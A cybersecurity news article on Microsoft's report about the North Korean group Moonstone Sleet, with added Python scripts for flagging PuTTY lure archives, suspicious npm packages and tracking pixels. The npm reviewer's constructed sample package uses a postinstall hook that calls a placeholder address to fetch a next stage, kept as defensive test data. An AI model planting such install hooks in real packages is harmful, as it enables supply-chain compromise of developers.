Cyber security news for all

    Microsoft Unveils ‘Moonstone Sleet’ — New North Korean Hacker Collective

    A newly identified North Korean threat actor, tracked as Moonstone Sleet, has been observed attacking organizations in the software, information technology, education, and defense sectors, using ransomware and custom malware previously linked to the notorious Lazarus Group.

    According to a recent analysis by the Microsoft Threat Intelligence team, Moonstone Sleet sets up fictitious companies and job opportunities to engage potential targets, distributes trojanized versions of legitimate tools, built a malicious game, and has deployed new custom ransomware.

    The modus operandi of this adversary combines traditional methodologies employed by other North Korean groups with distinctive strategies to accomplish its strategic goals.

    Initially categorized by Redmond under the moniker Storm-1789, Moonstone Sleet is believed to be a state-backed entity that initially shared operational tactics with the Lazarus Group (also known as Diamond Sleet), before forging its own identity through separate infrastructure and techniques.

    The resemblance to Lazarus includes extensive reuse of code from known malware such as Comebacker, first detected in January 2021 targeting security researchers involved in vulnerability research.

    Comebacker, used by Lazarus as recently as February, was embedded within seemingly benign Python and npm packages to establish communication with a command-and-control (C2) server and fetch additional payloads.

    In pursuit of diverse objectives, Moonstone Sleet is also known to seek employment in software development roles across multiple legitimate firms, likely aiming to generate illicit revenue for the country or infiltrate organizations clandestinely.

    Attacks observed in August 2023 involved a modified version of PuTTY, distributed via LinkedIn, Telegram, and developer freelancing platforms, a tactic Lazarus also used in late 2022.

    Often, the actor would send a .ZIP archive containing a trojanized putty.exe and a url.txt file, and prompt the target to enter the provided credentials into PuTTY; doing so caused the modified PuTTY to decrypt an embedded payload and execute it.

    The trojanized PuTTY executable drops a custom installer named SplitLoader, which initiates a series of stages culminating in a Trojan loader that executes a payload retrieved from the C2 server.
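    The archive layout described above (a putty.exe alongside a url.txt) is something a mail gateway or triage workflow can flag on its own, and an unknown putty.exe hash is a second, independent signal. The following Python script is an added example written for this page, not code from Microsoft or from the original article; the allowlist of known-good PuTTY digests is a constructed placeholder (fill it from binaries fetched directly from the official PuTTY site), and the two sample archives are built in memory from inert placeholder bytes.

```python
import hashlib
import io
import zipfile
from dataclasses import dataclass, field

# Placeholder allowlist of SHA-256 digests for the genuine PuTTY builds an
# organisation permits. Constructed value, not a real PuTTY hash: populate it
# from binaries downloaded directly from the official PuTTY site.
KNOWN_GOOD_PUTTY_SHA256 = {
    "0000000000000000000000000000000000000000000000000000000000000000",
}


@dataclass
class ArchiveFinding:
    suspicious: bool = False
    reasons: list[str] = field(default_factory=list)
    exe_hashes: dict[str, str] = field(default_factory=dict)


def triage_archive(data: bytes) -> ArchiveFinding:
    """Flag a .ZIP that matches the PuTTY lure layout or carries an unknown putty.exe."""
    finding = ArchiveFinding()
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        # Key entries by lower-cased basename so "Tools/PuTTY.exe" still matches.
        entries = {info.filename.rsplit("/", 1)[-1].lower(): info for info in zf.infolist()}
        for base, info in entries.items():
            if base.endswith(".exe"):
                finding.exe_hashes[base] = hashlib.sha256(zf.read(info)).hexdigest()
    if "putty.exe" in entries and "url.txt" in entries:
        finding.reasons.append("archive pairs putty.exe with url.txt (lure layout described in the report)")
    putty_hash = finding.exe_hashes.get("putty.exe")
    if putty_hash and putty_hash not in KNOWN_GOOD_PUTTY_SHA256:
        finding.reasons.append(f"putty.exe SHA-256 {putty_hash[:16]}... is not a known-good build")
    finding.suspicious = bool(finding.reasons)
    return finding


def build_archive(files: dict[str, bytes]) -> bytes:
    """Build an in-memory .ZIP from a {name: content} mapping (used for the constructed samples)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples: inert placeholder bytes, not real binaries.
LURE_ARCHIVE = build_archive({
    "putty.exe": b"MZ" + b"\x00" * 62,
    "url.txt": b"<connection details the target is told to enter into PuTTY>\n",
})
BENIGN_ARCHIVE = build_archive({"notes.txt": b"meeting notes\n"})

if __name__ == "__main__":
    for label, blob in (("lure", LURE_ARCHIVE), ("benign", BENIGN_ARCHIVE)):
        result = triage_archive(blob)
        print(label, "suspicious" if result.suspicious else "clean", result.reasons)
```

    The two checks are deliberately independent: the filename pairing catches the social-engineering package even if the binary is swapped, and the hash check catches a lone unsigned putty.exe without the url.txt companion.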

    Another delivery method relies on malicious npm packages: posing as fake companies on LinkedIn or freelancing platforms, the actor sends .ZIP archives containing the packages under the guise of a technical skills assessment.

    These packages are configured to connect to an actor-controlled IP address, dropping payloads similar to SplitLoader or facilitating credential theft from the Windows Local Security Authority Subsystem Service (LSASS) process.
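    A developer handed a "skills assessment" package can check it before running npm install. The Python reviewer below is an added example for this page, not code from Microsoft or the article; it looks for the two traits the report describes, code that runs automatically through npm lifecycle hooks and a hard-coded IP address the package reaches out to, plus use of process-execution primitives. The sample package, its name, and the 203.0.113.10 address (a documentation range) are constructed.

```python
import json
import re
from ipaddress import ip_address

# npm runs these scripts automatically during `npm install`, so they are the
# usual place for a package to execute code the developer never called.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
IPV4_LITERAL = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXEC_PRIMITIVE = re.compile(r"\b(?:child_process|execSync|spawnSync|eval)\b")


def review_package(files: dict[str, str]) -> dict:
    """files maps relative path -> text content of an unpacked npm package."""
    findings: list[str] = []
    manifest = json.loads(files.get("package.json", "{}"))
    for hook, command in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE_HOOKS:
            findings.append(f"package.json: lifecycle hook '{hook}' runs `{command}`")
    for path, text in files.items():
        if not path.endswith((".js", ".cjs", ".mjs")):
            continue
        for literal in sorted(set(IPV4_LITERAL.findall(text))):
            try:
                addr = ip_address(literal)
            except ValueError:
                continue  # e.g. a four-part version number with an octet above 255
            if not (addr.is_loopback or addr.is_unspecified):
                findings.append(f"{path}: hard-coded IP address {literal}")
        if EXEC_PRIMITIVE.search(text):
            findings.append(f"{path}: uses a process-execution primitive")
    return {"suspicious": bool(findings), "findings": findings}


# Constructed sample mimicking the lure: a postinstall hook runs a script that
# contacts a hard-coded address. Package name and address are placeholders.
SAMPLE_PACKAGE = {
    "package.json": json.dumps({
        "name": "coding-assessment-task",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
    }),
    "setup.js": (
        "const { execSync } = require('child_process');\n"
        "const http = require('http');\n"
        "http.get('http://203.0.113.10/stage', (res) => { /* next stage */ });\n"
    ),
    "index.js": "module.exports = () => 'hello';\n",
}

# Constructed clean package: only a test script, no network or exec usage.
CLEAN_PACKAGE = {
    "package.json": json.dumps({"name": "pad-util", "version": "1.0.0", "scripts": {"test": "node test.js"}}),
    "index.js": "module.exports = (s, n) => s.padStart(n);\n",
}

if __name__ == "__main__":
    for label, pkg in (("sample", SAMPLE_PACKAGE), ("clean", CLEAN_PACKAGE)):
        print(label, review_package(pkg))
```

    Running npm install with --ignore-scripts and reviewing the findings first turns an automatic execution into a deliberate one; the regexes are intentionally coarse, so treat a hit as a reason to read the file, not as a verdict.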

    Notably, the targeting of npm developers using counterfeit packages has been associated with a campaign previously documented by Palo Alto Networks Unit 42, tracked by Microsoft under the name Storm-1877.

    Rogue npm packages have also served as a malware delivery mechanism for another North Korea-linked group dubbed Jade Sleet, implicated in the JumpCloud hack last year.

    Additional attacks since February 2024 have utilized a malicious tank game called DeTankWar, distributed via email or messaging platforms, along with the creation of fake websites and accounts on X (formerly Twitter) to lend legitimacy.

    Moonstone Sleet typically approaches targets through messaging platforms or email, presenting itself as a game developer seeking investment or collaboration, often masquerading as a legitimate blockchain entity or using fictitious companies.

    One such instance involved a fake company named C.C. Waterfall, presenting a blockchain-related project and offering collaboration opportunities, with a download link included in the email body.

    The game file (“delfi-tank-unity.exe”) contains a malware loader dubbed YouieLoad, capable of loading next-stage payloads in memory and creating malicious services for network and user discovery and browser data collection.

    Another non-existent company created by Moonstone Sleet for social engineering campaigns is StarGlow Ventures, masquerading as a legitimate software development entity to engage prospective targets for collaboration on various projects.

    While the outcome of this campaign remains unclear, the inclusion of a tracking pixel in the email messages suggests a trust-building exercise to gauge recipient engagement for future revenue-generation opportunities.
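    A tracking pixel is simply a remote image the mail client fetches when the message is rendered, usually sized or styled so the reader never sees it. The parser below is an added example for this page, not code from Microsoft or the article; it flags remote <img> elements that are 0 or 1 pixel in size or hidden by inline style, which is the signal a mail filter can use to warn recipients or to keep images unloaded by default. The sample message and the tracker.example and mail.example hosts are constructed.

```python
from html.parser import HTMLParser


class TrackingPixelFinder(HTMLParser):
    """Collect remote <img> sources that are sized or styled to be invisible."""

    def __init__(self) -> None:
        super().__init__()
        self.pixels: list[str] = []

    def handle_starttag(self, tag: str, attrs: list) -> None:
        if tag != "img":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src", "")
        if not src.lower().startswith(("http://", "https://")):
            return  # inline (cid:/data:) images do not beacon to a server
        width = a.get("width", "").strip().lower().removesuffix("px")
        height = a.get("height", "").strip().lower().removesuffix("px")
        style = a.get("style", "").replace(" ", "").lower()
        tiny = width in {"0", "1"} and height in {"0", "1"}
        hidden = any(m in style for m in ("display:none", "visibility:hidden", "width:1px", "height:1px"))
        if tiny or hidden:
            self.pixels.append(src)


def find_tracking_pixels(html: str) -> list[str]:
    """Return the remote image URLs in an HTML email that look like tracking beacons."""
    finder = TrackingPixelFinder()
    finder.feed(html)
    finder.close()
    return finder.pixels


# Constructed sample email: a visible logo plus a hidden 1x1 beacon.
SAMPLE_EMAIL = """\
<html><body>
<p>Hello, we would love to collaborate with you on our project.</p>
<img src="https://mail.example/logo.png" width="200" height="60" alt="logo">
<img src="https://tracker.example/open?id=RECIPIENT-PLACEHOLDER" width="1" height="1" style="display:none">
<img src="data:image/gif;base64,R0lGODlhAQABAAAAACw=" width="1" height="1">
</body></html>
"""

if __name__ == "__main__":
    for url in find_tracking_pixels(SAMPLE_EMAIL):
        print("tracking pixel:", url)
```

    The inline data: image in the sample is deliberately not reported, since an embedded image cannot tell the sender anything; only a fetch from a remote host does.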

    The latest addition to the adversary’s arsenal is a custom ransomware variant named FakePenny, deployed against an unnamed defense technology company in April 2024, demanding a $6.6 million ransom in Bitcoin.

    The use of ransomware mirrors tactics employed by Andariel (also known as Onyx Sleet), a sub-group of the Lazarus umbrella known for ransomware families like H0lyGh0st and Maui.

    In addition to fortifying defenses against Moonstone Sleet, Microsoft advises vigilance against supply chain attacks, given North Korean hacking groups’ proclivity for compromising the software supply chain for widespread malicious operations.

    Moonstone Sleet’s diverse tactics show how it has evolved beyond those of other North Korean threat actors over years of activity in pursuit of the country’s cyber objectives.

    This disclosure comes as South Korea accuses its northern counterpart, particularly the Lazarus Group, of pilfering 1,014 gigabytes of data from a court network between January 7, 2021, and February 9, 2023.
